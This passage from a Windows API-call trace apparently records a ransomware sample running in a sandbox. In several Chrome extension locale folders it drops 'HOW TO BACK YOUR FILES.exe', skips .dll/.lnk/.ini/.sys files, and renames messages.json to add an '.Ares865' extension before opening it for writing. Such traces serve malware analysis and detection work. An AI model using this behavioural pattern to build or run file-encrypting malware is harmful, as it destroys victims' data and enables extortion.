dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.909] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0100.914] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no" [0100.915] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no" [0100.915] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.915] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.915] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.916] GetLastError () returned 0x0 [0100.916] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.916] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e338680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e338680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.916] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.916] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.916] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.916] lstrlenW (lpString="messages.json") returned 13 [0100.916] lstrlenW (lpString="Ares865") returned 7 [0100.916] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.916] lstrlenW (lpString=".dll") returned 4 [0100.916] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.916] lstrlenW (lpString=".lnk") returned 4 [0100.916] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.916] lstrlenW (lpString=".ini") returned 4 [0100.916] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.916] lstrlenW (lpString=".sys") returned 4 [0100.916] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.916] lstrlenW (lpString="messages.json") returned 13 [0100.917] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.Ares865") returned 160 [0100.917] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.918] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.918] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=210) returned 1 [0100.922] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl" [0100.922] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl" [0100.922] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.922] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.922] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.923] GetLastError () returned 0x0 [0100.923] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.923] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e338680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e338680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.923] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.923] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.923] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.923] lstrlenW (lpString="messages.json") returned 13 [0100.923] lstrlenW (lpString="Ares865") returned 7 [0100.923] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.923] lstrlenW (lpString=".dll") returned 4 [0100.923] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.923] lstrlenW (lpString=".lnk") returned 4 [0100.923] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.924] lstrlenW (lpString=".ini") returned 4 [0100.924] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.924] lstrlenW (lpString=".sys") returned 4 [0100.924] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.924] lstrlenW (lpString="messages.json") returned 13 [0100.924] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.Ares865") returned 160 [0100.924] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.927] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.928] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=232) returned 1 [0100.931] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv" [0100.931] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv" [0100.931] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.931] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.932] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.932] GetLastError () returned 0x0 [0100.932] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.932] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e338680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e338680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.933] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.933] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.933] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.933] lstrlenW (lpString="messages.json") returned 13 [0100.933] lstrlenW (lpString="Ares865") returned 7 [0100.933] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.933] lstrlenW (lpString=".dll") returned 4 [0100.933] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.933] lstrlenW (lpString=".lnk") returned 4 [0100.933] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.933] lstrlenW (lpString=".ini") returned 4 [0100.933] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.933] lstrlenW (lpString=".sys") returned 4 [0100.933] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.933] lstrlenW (lpString="messages.json") returned 13 [0100.933] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.Ares865") returned 160 [0100.933] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.935] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=238) returned 1 [0100.938] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt" [0100.938] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt" [0100.938] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.938] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.939] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.939] GetLastError () returned 0x0 [0100.939] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e35e7e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e35e7e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.940] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.940] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.940] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.940] lstrlenW (lpString="messages.json") returned 13 [0100.940] lstrlenW (lpString="Ares865") returned 7 [0100.940] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.940] lstrlenW (lpString=".dll") returned 4 [0100.940] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.940] lstrlenW (lpString=".lnk") returned 4 [0100.940] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.940] lstrlenW (lpString=".ini") returned 4 [0100.940] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.940] lstrlenW (lpString=".sys") returned 4 [0100.940] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.940] lstrlenW (lpString="messages.json") returned 13 [0100.940] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.Ares865") returned 160 [0100.940] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.942] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.942] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=253) returned 1 [0100.945] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko" [0100.945] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko" [0100.946] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.946] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.946] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.946] GetLastError () returned 0x0 [0100.947] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.947] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, 